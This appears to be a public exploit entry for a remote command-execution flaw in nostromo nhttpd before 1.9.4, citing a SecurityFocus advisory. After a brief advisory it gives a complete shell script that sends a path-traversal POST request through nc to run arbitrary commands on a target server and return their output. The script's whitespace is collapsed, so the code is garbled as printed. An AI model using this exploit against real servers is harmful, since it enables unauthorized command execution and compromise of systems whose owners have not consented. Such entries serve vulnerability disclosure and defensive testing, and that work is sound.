source: https://www.securityfocus.com/bid/46880/info
nostromo nhttpd is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied data.
An attacker can exploit this issue to access arbitrary files and execute arbitrary commands with application-level privileges.
nostromo versions prior to 1.9.4 are affected.
#!/bin/sh#########################################RedTeam Pentesting GmbH ##kontakt@redteam-pentesting.de ##http://www.redteam-pentesting.de#########################################if[$#-lt3];thenecho"Usage: $(basename $0) HOST PORT COMMAND..."exit2fiHOST="$1"PORT="$2"shift2(\echo-n-e'POST /..%2f..%2f..%2fbin/sh HTTP/1.0\r\n';\echo-n-e'Content-Length: 1\r\n\r\necho\necho\n';\echo"$@ 2>&1"\)|nc"$HOST""$PORT"\|sed--quiet--expression':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'